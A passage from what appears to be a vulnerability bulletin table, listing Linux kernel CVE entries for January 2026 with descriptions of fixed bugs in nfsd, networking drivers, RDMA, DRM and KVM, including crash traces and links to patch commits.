https://git.kernel.org/stable/c/72f98ef9a4be30d2a60136dd6faee376f780d06c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nfsd: fix nfsd_file reference leak in nfsd4_add_rdaccess_to_wrdeleg() nfsd4_add_rdaccess_to_wrdeleg() unconditionally overwrites fp->fi_fds[O_RDONLY] with a newly acquired nfsd_file. However, if the client already has a SHARE_ACCESS_READ open from a previous OPEN operation, this action overwrites the existing pointer without releasing its reference, orphaning the previous reference. Additionally, the function originally stored the same nfsd_file pointer in both fp->fi_fds[O_RDONLY] and fp->fi_rdeleg_file with only a single reference. When put_deleg_file() runs, it clears fi_rdeleg_file and calls nfs4_file_put_access() to release the file. However, nfs4_file_put_access() only releases fi_fds[O_RDONLY] when the fi_access[O_RDONLY] counter drops to zero. If another READ open exists on the file, the counter remains elevated and the nfsd_file reference from the delegation is never released. This potentially causes open conflicts on that file. Then, on server shutdown, these leaks cause __nfsd_file_cache_purge() to encounter files with an elevated reference count that cannot be cleaned up, ultimately triggering a BUG() in kmem_cache_destroy() because there are still nfsd_file objects allocated in that cache. | 2026-01-13 | not yet calculated | CVE-2025-71090 | https://git.kernel.org/stable/c/c07dc84ed67c5a182273171639bacbbb87c12175 https://git.kernel.org/stable/c/8072e34e1387d03102b788677d491e2bcceef6f5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: team: fix check for port enabled in team_queue_override_port_prio_changed() There has been a syzkaller bug reported recently with the following trace: list_del corruption, ffff888058bea080->prev is LIST_POISON2 (dead000000000122) ------------[ cut here ]------------ kernel BUG at lib/list_debug.c:59! Oops: invalid opcode: 0000 [#1] SMP KASAN NOPTI CPU: 3 UID: 0 PID: 21246 Comm: syz.0.2928 Not tainted syzkaller #0 PREEMPT(full) Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014 RIP: 0010:__list_del_entry_valid_or_report+0x13e/0x200 lib/list_debug.c:59 Code: 48 c7 c7 e0 71 f0 8b e8 30 08 ef fc 90 0f 0b 48 89 ef e8 a5 02 55 fd 48 89 ea 48 89 de 48 c7 c7 40 72 f0 8b e8 13 08 ef fc 90 <0f> 0b 48 89 ef e8 88 02 55 fd 48 89 ea 48 b8 00 00 00 00 00 fc ff RSP: 0018:ffffc9000d49f370 EFLAGS: 00010286 RAX: 000000000000004e RBX: ffff888058bea080 RCX: ffffc9002817d000 RDX: 0000000000000000 RSI: ffffffff819becc6 RDI: 0000000000000005 RBP: dead000000000122 R08: 0000000000000005 R09: 0000000000000000 R10: 0000000080000000 R11: 0000000000000001 R12: ffff888039e9c230 R13: ffff888058bea088 R14: ffff888058bea080 R15: ffff888055461480 FS: 00007fbbcfe6f6c0(0000) GS:ffff8880d6d0a000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 000000110c3afcb0 CR3: 00000000382c7000 CR4: 0000000000352ef0 Call Trace: <TASK> __list_del_entry_valid include/linux/list.h:132 [inline] __list_del_entry include/linux/list.h:223 [inline] list_del_rcu include/linux/rculist.h:178 [inline] __team_queue_override_port_del drivers/net/team/team_core.c:826 [inline] __team_queue_override_port_del drivers/net/team/team_core.c:821 [inline] team_queue_override_port_prio_changed drivers/net/team/team_core.c:883 [inline] team_priority_option_set+0x171/0x2f0 drivers/net/team/team_core.c:1534 team_option_set drivers/net/team/team_core.c:376 [inline] team_nl_options_set_doit+0x8ae/0xe60 drivers/net/team/team_core.c:2653 genl_family_rcv_msg_doit+0x209/0x2f0 net/netlink/genetlink.c:1115 genl_family_rcv_msg net/netlink/genetlink.c:1195 [inline] genl_rcv_msg+0x55c/0x800 net/netlink/genetlink.c:1210 netlink_rcv_skb+0x158/0x420 net/netlink/af_netlink.c:2552 genl_rcv+0x28/0x40 net/netlink/genetlink.c:1219 netlink_unicast_kernel net/netlink/af_netlink.c:1320 [inline] netlink_unicast+0x5aa/0x870 net/netlink/af_netlink.c:1346 netlink_sendmsg+0x8c8/0xdd0 net/netlink/af_netlink.c:1896 sock_sendmsg_nosec net/socket.c:727 [inline] __sock_sendmsg net/socket.c:742 [inline] ____sys_sendmsg+0xa98/0xc70 net/socket.c:2630 ___sys_sendmsg+0x134/0x1d0 net/socket.c:2684 __sys_sendmsg+0x16d/0x220 net/socket.c:2716 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xcd/0xfa0 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f The problem is in this flow: 1) Port is enabled, queue_id != 0, in qom_list 2) Port gets disabled -> team_port_disable() -> team_queue_override_port_del() -> del (removed from list) 3) Port is disabled, queue_id != 0, not in any list 4) Priority changes -> team_queue_override_port_prio_changed() -> checks: port disabled && queue_id != 0 -> calls del - hits the BUG as it is removed already To fix this, change the check in team_queue_override_port_prio_changed() so it returns early if port is not enabled. | 2026-01-13 | not yet calculated | CVE-2025-71091 | https://git.kernel.org/stable/c/25029e813c4aae5fcf7118e8dd5c56e382b9a1a3 https://git.kernel.org/stable/c/f820e438b8ec2a8354e70e75145f05fe45500d97 https://git.kernel.org/stable/c/53a727a8bfd78c739e130a781192d0f6f8e03d39 https://git.kernel.org/stable/c/6bfb62b6010a16112dcae52f490e5e0e6abe12a3 https://git.kernel.org/stable/c/107d245f84cb4f55f597d31eda34b42a2b7d6952 https://git.kernel.org/stable/c/b71187648ef2349254673d0523fdf96d1fe3d758 https://git.kernel.org/stable/c/932ac51d9953eaf77a1252f79b656d4ca86163c6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/bnxt_re: Fix OOB write in bnxt_re_copy_err_stats() Commit ef56081d1864 ("RDMA/bnxt_re: RoCE related hardware counters update") added three new counters and placed them after BNXT_RE_OUT_OF_SEQ_ERR. BNXT_RE_OUT_OF_SEQ_ERR acts as a boundary marker for allocating hardware statistics with different num_counters values on chip_gen_p5_p7 devices. As a result, BNXT_RE_NUM_STD_COUNTERS are used when allocating hw_stats, which leads to an out-of-bounds write in bnxt_re_copy_err_stats(). The counters BNXT_RE_REQ_CQE_ERROR, BNXT_RE_RESP_CQE_ERROR, and BNXT_RE_RESP_REMOTE_ACCESS_ERRS are applicable to generic hardware, not only p5/p7 devices. Fix this by moving these counters before BNXT_RE_OUT_OF_SEQ_ERR so they are included in the generic counter set. | 2026-01-13 | not yet calculated | CVE-2025-71092 | https://git.kernel.org/stable/c/369a161c48723f60f06f3510b82ea7d96d0499ab https://git.kernel.org/stable/c/9b68a1cc966bc947d00e4c0df7722d118125aa37 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: e1000: fix OOB in e1000_tbi_should_accept() In e1000_tbi_should_accept() we read the last byte of the frame via 'data[length - 1]' to evaluate the TBI workaround. If the descriptor- reported length is zero or larger than the actual RX buffer size, this read goes out of bounds and can hit unrelated slab objects. The issue is observed from the NAPI receive path (e1000_clean_rx_irq): ================================================================== BUG: KASAN: slab-out-of-bounds in e1000_tbi_should_accept+0x610/0x790 Read of size 1 at addr ffff888014114e54 by task sshd/363 CPU: 0 PID: 363 Comm: sshd Not tainted 5.18.0-rc1 #1 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.12.0-59-gc9ba5276e321-prebuilt.qemu.org 04/01/2014 Call Trace: <IRQ> dump_stack_lvl+0x5a/0x74 print_address_description+0x7b/0x440 print_report+0x101/0x200 kasan_report+0xc1/0xf0 e1000_tbi_should_accept+0x610/0x790 e1000_clean_rx_irq+0xa8c/0x1110 e1000_clean+0xde2/0x3c10 __napi_poll+0x98/0x380 net_rx_action+0x491/0xa20 __do_softirq+0x2c9/0x61d do_softirq+0xd1/0x120 </IRQ> <TASK> __local_bh_enable_ip+0xfe/0x130 ip_finish_output2+0x7d5/0xb00 __ip_queue_xmit+0xe24/0x1ab0 __tcp_transmit_skb+0x1bcb/0x3340 tcp_write_xmit+0x175d/0x6bd0 __tcp_push_pending_frames+0x7b/0x280 tcp_sendmsg_locked+0x2e4f/0x32d0 tcp_sendmsg+0x24/0x40 sock_write_iter+0x322/0x430 vfs_write+0x56c/0xa60 ksys_write+0xd1/0x190 do_syscall_64+0x43/0x90 entry_SYSCALL_64_after_hwframe+0x44/0xae RIP: 0033:0x7f511b476b10 Code: 73 01 c3 48 8b 0d 88 d3 2b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 0f 1f 44 00 00 83 3d f9 2b 2c 00 00 75 10 b8 01 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 31 c3 48 83 ec 08 e8 8e 9b 01 00 48 89 04 24 RSP: 002b:00007ffc9211d4e8 EFLAGS: 00000246 ORIG_RAX: 0000000000000001 RAX: ffffffffffffffda RBX: 0000000000004024 RCX: 00007f511b476b10 RDX: 0000000000004024 RSI: 0000559a9385962c RDI: 0000000000000003 RBP: 0000559a9383a400 R08: fffffffffffffff0 R09: 0000000000004f00 R10: 0000000000000070 R11: 0000000000000246 R12: 0000000000000000 R13: 00007ffc9211d57f R14: 0000559a9347bde7 R15: 0000000000000003 </TASK> Allocated by task 1: __kasan_krealloc+0x131/0x1c0 krealloc+0x90/0xc0 add_sysfs_param+0xcb/0x8a0 kernel_add_sysfs_param+0x81/0xd4 param_sysfs_builtin+0x138/0x1a6 param_sysfs_init+0x57/0x5b do_one_initcall+0x104/0x250 do_initcall_level+0x102/0x132 do_initcalls+0x46/0x74 kernel_init_freeable+0x28f/0x393 kernel_init+0x14/0x1a0 ret_from_fork+0x22/0x30 The buggy address belongs to the object at ffff888014114000 which belongs to the cache kmalloc-2k of size 2048 The buggy address is located 1620 bytes to the right of 2048-byte region [ffff888014114000, ffff888014114800] The buggy address belongs to the physical page: page:ffffea0000504400 refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x14110 head:ffffea0000504400 order:3 compound_mapcount:0 compound_pincount:0 flags: 0x100000000010200(slab|head|node=0|zone=1) raw: 0100000000010200 0000000000000000 dead000000000001 ffff888013442000 raw: 0000000000000000 0000000000080008 00000001ffffffff 0000000000000000 page dumped because: kasan: bad access detected ================================================================== This happens because the TBI check unconditionally dereferences the last byte without validating the reported length first: u8 last_byte = *(data + length - 1); Fix by rejecting the frame early if the length is zero, or if it exceeds adapter->rx_buffer_len. This preserves the TBI workaround semantics for valid frames and prevents touching memory beyond the RX buffer. | 2026-01-13 | not yet calculated | CVE-2025-71093 | https://git.kernel.org/stable/c/4ccfa56f272241e8d8e2c38191fdbb03df489d80 https://git.kernel.org/stable/c/278b7cfe0d4da7502c7fd679b15032f014c92892 https://git.kernel.org/stable/c/ad7a2a45e2417ac54089926b520924f8f0d91aea https://git.kernel.org/stable/c/2c4c0c09f9648ba766d399917d420d03e7b3e1f8 https://git.kernel.org/stable/c/26c8bebc2f25288c2bcac7bc0a7662279a0e817c https://git.kernel.org/stable/c/ee7c125fb3e8b04dd46510130b9fc92380e5d578 https://git.kernel.org/stable/c/9c72a5182ed92904d01057f208c390a303f00a0f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: usb: asix: validate PHY address before use The ASIX driver reads the PHY address from the USB device via asix_read_phy_addr(). A malicious or faulty device can return an invalid address (>= PHY_MAX_ADDR), which causes a warning in mdiobus_get_phy(): addr 207 out of range WARNING: drivers/net/phy/mdio_bus.c:76 Validate the PHY address in asix_read_phy_addr() and remove the now-redundant check in ax88172a.c. | 2026-01-13 | not yet calculated | CVE-2025-71094 | https://git.kernel.org/stable/c/fc96018f09f8d30586ca6582c5045a84eafef146 https://git.kernel.org/stable/c/f5f4f30f3811d37e1aa48667c36add74e5a8d99f https://git.kernel.org/stable/c/38722e69ee64dbb020028c93898d25d6f4c0e0b2 https://git.kernel.org/stable/c/98a12c2547a44a5f03f35c108d2022cc652cbc4d https://git.kernel.org/stable/c/bf8a0f3b787ca7c5889bfca12c60c483041fbee3 https://git.kernel.org/stable/c/a1e077a3f76eea0dc671ed6792e7d543946227e8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: stmmac: fix the crash issue for zero copy XDP_TX action There is a crash issue when running zero copy XDP_TX action, the crash log is shown below. [ 216.122464] Unable to handle kernel paging request at virtual address fffeffff80000000 [ 216.187524] Internal error: Oops: 0000000096000144 [#1] SMP [ 216.301694] Call trace: [ 216.304130] dcache_clean_poc+0x20/0x38 (P) [ 216.308308] __dma_sync_single_for_device+0x1bc/0x1e0 [ 216.313351] stmmac_xdp_xmit_xdpf+0x354/0x400 [ 216.317701] __stmmac_xdp_run_prog+0x164/0x368 [ 216.322139] stmmac_napi_poll_rxtx+0xba8/0xf00 [ 216.326576] __napi_poll+0x40/0x218 [ 216.408054] Kernel panic - not syncing: Oops: Fatal exception in interrupt For XDP_TX action, the xdp_buff is converted to xdp_frame by xdp_convert_buff_to_frame(). The memory type of the resulting xdp_frame depends on the memory type of the xdp_buff. For page pool based xdp_buff it produces xdp_frame with memory type MEM_TYPE_PAGE_POOL. For zero copy XSK pool based xdp_buff it produces xdp_frame with memory type MEM_TYPE_PAGE_ORDER0. However, stmmac_xdp_xmit_back() does not check the memory type and always uses the page pool type, this leads to invalid mappings and causes the crash. Therefore, check the xdp_buff memory type in stmmac_xdp_xmit_back() to fix this issue. | 2026-01-13 | not yet calculated | CVE-2025-71095 | https://git.kernel.org/stable/c/3f7823219407f2f18044c2b72366a48810c5c821 https://git.kernel.org/stable/c/4d0ceb7677e1c4616afb96abb4518f70b65abb0d https://git.kernel.org/stable/c/45ee0462b88396a0bd1df1991f801c89994ea72b https://git.kernel.org/stable/c/5e5988736a95b1de7f91b10ac2575454b70e4897 https://git.kernel.org/stable/c/a48e232210009be50591fdea8ba7c07b0f566a13 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/core: Check for the presence of LS_NLA_TYPE_DGID correctly The netlink response for RDMA_NL_LS_OP_IP_RESOLVE should always have a LS_NLA_TYPE_DGID attribute, it is invalid if it does not. Use the nl parsing logic properly and call nla_parse_deprecated() to fill the nlattrs array and then directly index that array to get the data for the DGID. Just fail if it is NULL. Remove the for loop searching for the nla, and squash the validation and parsing into one function. Fixes an uninitialized read from the stack triggered by userspace if it does not provide the DGID to a kernel initiated RDMA_NL_LS_OP_IP_RESOLVE query. BUG: KMSAN: uninit-value in hex_byte_pack include/linux/hex.h:13 [inline] BUG: KMSAN: uninit-value in ip6_string+0xef4/0x13a0 lib/vsprintf.c:1490 hex_byte_pack include/linux/hex.h:13 [inline] ip6_string+0xef4/0x13a0 lib/vsprintf.c:1490 ip6_addr_string+0x18a/0x3e0 lib/vsprintf.c:1509 ip_addr_string+0x245/0xee0 lib/vsprintf.c:1633 pointer+0xc09/0x1bd0 lib/vsprintf.c:2542 vsnprintf+0xf8a/0x1bd0 lib/vsprintf.c:2930 vprintk_store+0x3ae/0x1530 kernel/printk/printk.c:2279 vprintk_emit+0x307/0xcd0 kernel/printk/printk.c:2426 vprintk_default+0x3f/0x50 kernel/printk/printk.c:2465 vprintk+0x36/0x50 kernel/printk/printk_safe.c:82 _printk+0x17e/0x1b0 kernel/printk/printk.c:2475 ib_nl_process_good_ip_rsep drivers/infiniband/core/addr.c:128 [inline] ib_nl_handle_ip_res_resp+0x963/0x9d0 drivers/infiniband/core/addr.c:141 rdma_nl_rcv_msg drivers/infiniband/core/netlink.c:-1 [inline] rdma_nl_rcv_skb drivers/infiniband/core/netlink.c:239 [inline] rdma_nl_rcv+0xefa/0x11c0 drivers/infiniband/core/netlink.c:259 netlink_unicast_kernel net/netlink/af_netlink.c:1320 [inline] netlink_unicast+0xf04/0x12b0 net/netlink/af_netlink.c:1346 netlink_sendmsg+0x10b3/0x1250 net/netlink/af_netlink.c:1896 sock_sendmsg_nosec net/socket.c:714 [inline] __sock_sendmsg+0x333/0x3d0 net/socket.c:729 ____sys_sendmsg+0x7e0/0xd80 net/socket.c:2617 ___sys_sendmsg+0x271/0x3b0 net/socket.c:2671 __sys_sendmsg+0x1aa/0x300 net/socket.c:2703 __compat_sys_sendmsg net/compat.c:346 [inline] __do_compat_sys_sendmsg net/compat.c:353 [inline] __se_compat_sys_sendmsg net/compat.c:350 [inline] __ia32_compat_sys_sendmsg+0xa4/0x100 net/compat.c:350 ia32_sys_call+0x3f6c/0x4310 arch/x86/include/generated/asm/syscalls_32.h:371 do_syscall_32_irqs_on arch/x86/entry/syscall_32.c:83 [inline] __do_fast_syscall_32+0xb0/0x150 arch/x86/entry/syscall_32.c:306 do_fast_syscall_32+0x38/0x80 arch/x86/entry/syscall_32.c:331 do_SYSENTER_32+0x1f/0x30 arch/x86/entry/syscall_32.c:3 | 2026-01-13 | not yet calculated | CVE-2025-71096 | https://git.kernel.org/stable/c/376f46c8983458ead26cac83aa897a0b78491831 https://git.kernel.org/stable/c/bfe10318fc23e0b3f1d0a18dad387d29473a624d https://git.kernel.org/stable/c/45532638de5da24c201aa2a9b3dd4b054064de7b https://git.kernel.org/stable/c/9d85524789c2f17c0e87de8d596bcccc3683a1fc https://git.kernel.org/stable/c/acadd4097d25d6bd472bcb3f9f3eba2b5105d1ec https://git.kernel.org/stable/c/0b948afc1ded88b3562c893114387f34389eeb94 https://git.kernel.org/stable/c/a7b8e876e0ef0232b8076972c57ce9a7286b47ca |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ipv4: Fix reference count leak when using error routes with nexthop objects When a nexthop object is deleted, it is marked as dead and then fib_table_flush() is called to flush all the routes that are using the dead nexthop. The current logic in fib_table_flush() is to only flush error routes (e.g., blackhole) when it is called as part of network namespace dismantle (i.e., with flush_all=true). Therefore, error routes are not flushed when their nexthop object is deleted: # ip link add name dummy1 up type dummy # ip nexthop add id 1 dev dummy1 # ip route add 198.51.100.1/32 nhid 1 # ip route add blackhole 198.51.100.2/32 nhid 1 # ip nexthop del id 1 # ip route show blackhole 198.51.100.2 nhid 1 dev dummy1 As such, they keep holding a reference on the nexthop object which in turn holds a reference on the nexthop device, resulting in a reference count leak: # ip link del dev dummy1 [ 70.516258] unregister_netdevice: waiting for dummy1 to become free. Usage count = 2 Fix by flushing error routes when their nexthop is marked as dead. IPv6 does not suffer from this problem. | 2026-01-13 | not yet calculated | CVE-2025-71097 | https://git.kernel.org/stable/c/5de7ad7e18356e39e8fbf7edd185a5faaf4f385a https://git.kernel.org/stable/c/33ff5c207c873215e54e6176624ed57423cb7dea https://git.kernel.org/stable/c/30386e090c49e803c0616a7147e43409c32a2b0e https://git.kernel.org/stable/c/5979338c83012110ccd45cae6517591770bfe536 https://git.kernel.org/stable/c/ee4183501ea556dca31f5ffd8690aa9fd25b609f https://git.kernel.org/stable/c/e3fc381320d04e4a74311e576a86cac49a16fc43 https://git.kernel.org/stable/c/ac782f4e3bfcde145b8a7f8af31d9422d94d172a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ip6_gre: make ip6gre_header() robust Over the years, syzbot found many ways to crash the kernel in ip6gre_header() [1]. This involves team or bonding drivers ability to dynamically change their dev->needed_headroom and/or dev->hard_header_len In this particular crash mld_newpack() allocated an skb with a too small reserve/headroom, and by the time mld_sendpack() was called, syzbot managed to attach an ip6gre device. [1] skbuff: skb_under_panic: text:ffffffff8a1d69a8 len:136 put:40 head:ffff888059bc7000 data:ffff888059bc6fe8 tail:0x70 end:0x6c0 dev:team0 ------------[ cut here ]------------ kernel BUG at net/core/skbuff.c:213 ! <TASK> skb_under_panic net/core/skbuff.c:223 [inline] skb_push+0xc3/0xe0 net/core/skbuff.c:2641 ip6gre_header+0xc8/0x790 net/ipv6/ip6_gre.c:1371 dev_hard_header include/linux/netdevice.h:3436 [inline] neigh_connected_output+0x286/0x460 net/core/neighbour.c:1618 neigh_output include/net/neighbour.h:556 [inline] ip6_finish_output2+0xfb3/0x1480 net/ipv6/ip6_output.c:136 __ip6_finish_output net/ipv6/ip6_output.c:-1 [inline] ip6_finish_output+0x234/0x7d0 net/ipv6/ip6_output.c:220 NF_HOOK_COND include/linux/netfilter.h:307 [inline] ip6_output+0x340/0x550 net/ipv6/ip6_output.c:247 NF_HOOK+0x9e/0x380 include/linux/netfilter.h:318 mld_sendpack+0x8d4/0xe60 net/ipv6/mcast.c:1855 mld_send_cr net/ipv6/mcast.c:2154 [inline] mld_ifc_work+0x83e/0xd60 net/ipv6/mcast.c:2693 | 2026-01-13 | not yet calculated | CVE-2025-71098 | https://git.kernel.org/stable/c/17e7386234f740f3e7d5e58a47b5847ea34c3bc2 https://git.kernel.org/stable/c/41a1a3140aff295dee8063906f70a514548105e8 https://git.kernel.org/stable/c/adee129db814474f2f81207bd182bf343832a52e https://git.kernel.org/stable/c/1717357007db150c2d703f13f5695460e960f26c https://git.kernel.org/stable/c/5fe210533e3459197eabfdbf97327dacbdc04d60 https://git.kernel.org/stable/c/91a2b25be07ce1a7549ceebbe82017551d2eec92 https://git.kernel.org/stable/c/db5b4e39c4e63700c68a7e65fc4e1f1375273476 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/xe/oa: Fix potential UAF in xe_oa_add_config_ioctl() In xe_oa_add_config_ioctl(), we accessed oa_config->id after dropping metrics_lock. Since this lock protects the lifetime of oa_config, an attacker could guess the id and call xe_oa_remove_config_ioctl() with perfect timing, freeing oa_config before we dereference it, leading to a potential use-after-free. Fix this by caching the id in a local variable while holding the lock. v2: (Matt A) - Dropped mutex_unlock(&oa->metrics_lock) ordering change from xe_oa_remove_config_ioctl() (cherry picked from commit 28aeaed130e8e587fd1b73b6d66ca41ccc5a1a31) | 2026-01-13 | not yet calculated | CVE-2025-71099 | https://git.kernel.org/stable/c/c6d30b65b7a44dac52ad49513268adbf19eab4a2 https://git.kernel.org/stable/c/7cdb9a9da935c687563cc682155461fef5f9b48d https://git.kernel.org/stable/c/dcb171931954c51a1a7250d558f02b8f36570783 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: rtlwifi: 8192cu: fix tid out of range in rtl92cu_tx_fill_desc() TID getting from ieee80211_get_tid() might be out of range of array size of sta_entry->tids[], so check TID is less than MAX_TID_COUNT. Othwerwise, UBSAN warn: UBSAN: array-index-out-of-bounds in drivers/net/wireless/realtek/rtlwifi/rtl8192cu/trx.c:514:30 index 10 is out of range for type 'rtl_tid_data [9]' | 2026-01-13 | not yet calculated | CVE-2025-71100 | https://git.kernel.org/stable/c/9765d6eb8298b07d499cdf9ef7c237d3540102d6 https://git.kernel.org/stable/c/90a15ff324645aa806d81fa349497cd964861b66 https://git.kernel.org/stable/c/dd39edb445f07400e748da967a07d5dca5c5f96e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: platform/x86: hp-bioscfg: Fix out-of-bounds array access in ACPI package parsing The hp_populate_*_elements_from_package() functions in the hp-bioscfg driver contain out-of-bounds array access vulnerabilities. These functions parse ACPI packages into internal data structures using a for loop with index variable 'elem' that iterates through enum_obj/integer_obj/order_obj/password_obj/string_obj arrays. When processing multi-element fields like PREREQUISITES and ENUM_POSSIBLE_VALUES, these functions read multiple consecutive array elements using expressions like 'enum_obj[elem + reqs]' and 'enum_obj[elem + pos_values]' within nested loops. The bug is that the bounds check only validated elem, but did not consider the additional offset when accessing elem + reqs or elem + pos_values. The fix changes the bounds check to validate the actual accessed index. | 2026-01-13 | not yet calculated | CVE-2025-71101 | https://git.kernel.org/stable/c/cf7ae870560b988247a4bbbe5399edd326632680 https://git.kernel.org/stable/c/db4c26adf7117b1a4431d1197ae7109fee3230ad https://git.kernel.org/stable/c/79cab730dbaaac03b946c7f5681bd08c986e2abd https://git.kernel.org/stable/c/e44c42c830b7ab36e3a3a86321c619f24def5206 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scs: fix a wrong parameter in __scs_magic __scs_magic() needs a 'void *' variable, but a 'struct task_struct *' is given. 'task_scs(tsk)' is the starting address of the task's shadow call stack, and '__scs_magic(task_scs(tsk))' is the end address of the task's shadow call stack. Here should be '__scs_magic(task_scs(tsk))'. The user-visible effect of this bug is that when CONFIG_DEBUG_STACK_USAGE is enabled, the shadow call stack usage checking function (scs_check_usage) would scan an incorrect memory range. This could lead 1. **Inaccurate stack usage reporting**: The function would calculate wrong usage statistics for the shadow call stack, potentially showing incorrect value in kmsg. 2. **Potential kernel crash**: If the value of __scs_magic(tsk)is greater than that of __scs_magic(task_scs(tsk)), the for loop may access unmapped memory, potentially causing a kernel panic. However, this scenario is unlikely because task_struct is allocated via the slab allocator (which typically returns lower addresses), while the shadow call stack returned by task_scs(tsk) is allocated via vmalloc(which typically returns higher addresses). However, since this is purely a debugging feature (CONFIG_DEBUG_STACK_USAGE), normal production systems should be not unaffected. The bug only impacts developers and testers who are actively debugging stack usage with this configuration enabled. | 2026-01-14 | not yet calculated | CVE-2025-71102 | https://git.kernel.org/stable/c/1727e8bd69103a68963a5613a0ddb6d8d37df5d3 https://git.kernel.org/stable/c/cfdf6250b63b953b1d8e60814c8ca96c6f9d1c8c https://git.kernel.org/stable/c/57ba40b001be27786d0570dd292289df748b306b https://git.kernel.org/stable/c/062774439d442882b44f5eab8c256ad3423ef284 https://git.kernel.org/stable/c/9ef28943471a16e4f9646bc3e8e2de148e7d8d7b https://git.kernel.org/stable/c/a19fb3611e4c06624fc0f83ef19f4fb8d57d4751 https://git.kernel.org/stable/c/08bd4c46d5e63b78e77f2605283874bbe868ab19 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/msm: adreno: fix deferencing ifpc_reglist when not declared On plaforms with an a7xx GPU not supporting IFPC, the ifpc_reglist if still deferenced in a7xx_patch_pwrup_reglist() which causes a kernel crash: Unable to handle kernel NULL pointer dereference at virtual address 0000000000000008 ... pc : a6xx_hw_init+0x155c/0x1e4c [msm] lr : a6xx_hw_init+0x9a8/0x1e4c [msm] ... Call trace: a6xx_hw_init+0x155c/0x1e4c [msm] (P) msm_gpu_hw_init+0x58/0x88 [msm] adreno_load_gpu+0x94/0x1fc [msm] msm_open+0xe4/0xf4 [msm] drm_file_alloc+0x1a0/0x2e4 [drm] drm_client_init+0x7c/0x104 [drm] drm_fbdev_client_setup+0x94/0xcf0 [drm_client_lib] drm_client_setup+0xb4/0xd8 [drm_client_lib] msm_drm_kms_post_init+0x2c/0x3c [msm] msm_drm_init+0x1a4/0x228 [msm] msm_drm_bind+0x30/0x3c [msm] ... Check the validity of ifpc_reglist before deferencing the table to setup the register values. Patchwork: https://patchwork.freedesktop.org/patch/688944/ | 2026-01-14 | not yet calculated | CVE-2025-71103 | https://git.kernel.org/stable/c/19648135e904bce447d368ecb6136e5da809639c https://git.kernel.org/stable/c/129049d4fe22c998ae9fd1ec479fbb4ed5338c15 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: KVM: x86: Fix VM hard lockup after prolonged inactivity with periodic HV timer When advancing the target expiration for the guest's APIC timer in periodic mode, set the expiration to "now" if the target expiration is in the past (similar to what is done in update_target_expiration()). Blindly adding the period to the previous target expiration can result in KVM generating a practically unbounded number of hrtimer IRQs due to programming an expired timer over and over. In extreme scenarios, e.g. if userspace pauses/suspends a VM for an extended duration, this can even cause hard lockups in the host. Currently, the bug only affects Intel CPUs when using the hypervisor timer (HV timer), a.k.a. the VMX preemption timer. Unlike the software timer, a.k.a. hrtimer, which KVM keeps running even on exits to userspace, the HV timer only runs while the guest is active. As a result, if the vCPU does not run for an extended duration, there will be a huge gap between the target expiration and the current time the vCPU resumes running. Because the target expiration is incremented by only one period on each timer expiration, this leads to a series of timer expirations occurring rapidly after the vCPU/VM resumes. More critically, when the vCPU first triggers a periodic HV timer expiration after resuming, advancing the expiration by only one period will result in a target expiration in the past. As a result, the delta may be calculated as a negative value. When the delta is converted into an absolute value (tscdeadline is an unsigned u64), the resulting value can overflow what the HV timer is capable of programming. I.e. the large value will exceed the VMX Preemption Timer's maximum bit width of cpu_preemption_timer_multi + 32, and thus cause KVM to switch from the HV timer to the software timer (hrtimers). After switching to the software timer, periodic timer expiration callbacks may be executed consecutively within a single clock interrupt handler, because hrtimers honors KVM's request for an expiration in the past and immediately re-invokes KVM's callback after reprogramming. And because the interrupt handler runs with IRQs disabled, restarting KVM's hrtimer over and over until the target expiration is advanced to "now" can result in a hard lockup. E.g. the following hard lockup was triggered in the host when running a Windows VM (only relevant because it used the APIC timer in periodic mode) after resuming the VM from a long suspend (in the host). NMI watchdog: Watchdog detected hard LOCKUP on cpu 45 ... RIP: 0010:advance_periodic_target_expiration+0x4d/0x80 [kvm] ... RSP: 0018:ff4f88f5d98d8ef0 EFLAGS: 00000046 RAX: fff0103f91be678e RBX: fff0103f91be678e RCX: 00843a7d9e127bcc RDX: 0000000000000002 RSI: 0052ca4003697505 RDI: ff440d5bfbdbd500 RBP: ff440d5956f99200 R08: ff2ff2a42deb6a84 R09: 000000000002a6c0 R10: 0122d794016332b3 R11: 0000000000000000 R12: ff440db1af39cfc0 R13: ff440db1af39cfc0 R14: ffffffffc0d4a560 R15: ff440db1af39d0f8 FS: 00007f04a6ffd700(0000) GS:ff440db1af380000(0000) knlGS:000000e38a3b8000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 000000d5651feff8 CR3: 000000684e038002 CR4: 0000000000773ee0 PKRU: 55555554 Call Trace: <IRQ> apic_timer_fn+0x31/0x50 [kvm] __hrtimer_run_queues+0x100/0x280 hrtimer_interrupt+0x100/0x210 ? ttwu_do_wakeup+0x19/0x160 smp_apic_timer_interrupt+0x6a/0x130 apic_timer_interrupt+0xf/0x20 </IRQ> Moreover, if the suspend duration of the virtual machine is not long enough to trigger a hard lockup in this scenario, since commit 98c25ead5eda ("KVM: VMX: Move preemption timer <=> hrtimer dance to common x86"), KVM will continue using the software timer until the guest reprograms the APIC timer in some way. Since the periodic timer does not require frequent APIC timer register 